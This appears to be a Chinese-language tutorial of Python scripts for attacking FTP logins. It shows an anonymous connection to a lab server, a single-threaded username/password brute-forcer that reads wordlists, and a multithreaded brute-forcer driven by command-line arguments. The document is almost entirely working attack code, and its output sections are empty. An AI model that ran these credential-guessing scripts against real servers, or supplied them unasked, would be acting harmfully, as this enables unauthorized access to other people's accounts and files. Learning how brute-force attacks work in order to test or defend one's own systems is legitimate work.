1.连接ftp服务器
import ftplib
ftp = ftplib.FTP()
ftp.connect('192.168.50.130', 21)
ftp.login("anonymous","") #用户为匿名,密码为空
list = ftp.retrlines('list') #此时可以获得当前ftp目录下的所有文件的信息
print(list)
运行结果:
2.ftp登录用户名和密码单线程爆破
import ftplib
ftp = ftplib.FTP()
for username in open('ftp_user.txt'):
for password in open('ftp_pwd.txt'):
username = username.replace('\n','')
password = password.replace('\n','')
# print(username+'|'+password)
try:
ftp.connect('192.168.50.130', 21)
ftp.login(username,password)
print(username+'|'+password+'| ok')
list = ftp.retrlines('list') #此时可以获得当前ftp目录下的所有文件的信息
print(list)
except ftplib.all_errors:
print("error")
ftp_pwd.txt:
ftp_user.txt:
运行结果:
3.多线程爆破
ftp服务器设置的最多8个线程
import ftplib,sys,queue,threading
def ftp_brute(ip,port):
ftp = ftplib.FTP()
ftp.connect(ip,port)
while not q.empty():
dict = q.get()
dict = dict.split('|')
username = dict[0]
password = dict[1]
try:
ftp.login(username,password)
print(username+'|'+password+'| ok')
list = ftp.retrlines('list') #此时可以获得当前ftp目录下的所有文件的信息
print(list)
except ftplib.all_errors:
print(username + '|' + password + '| no')
pass
if __name__ == '__main__':
ip = sys.argv[1]
port = int(sys.argv[2])
userfile = sys.argv[3]
passfile = sys.argv[4]
threading_num = int(sys.argv[5])
q = queue.Queue()
for username in open(userfile):
for password in open(passfile):
username = username.replace('\n','')
password = password.replace('\n','')
# print(username+'|'+password)
q.put(username + '|' + password)
for x in range(threading_num):
t = threading.Thread(target=ftp_brute,args=(ip,port))
t.start()
运行结果: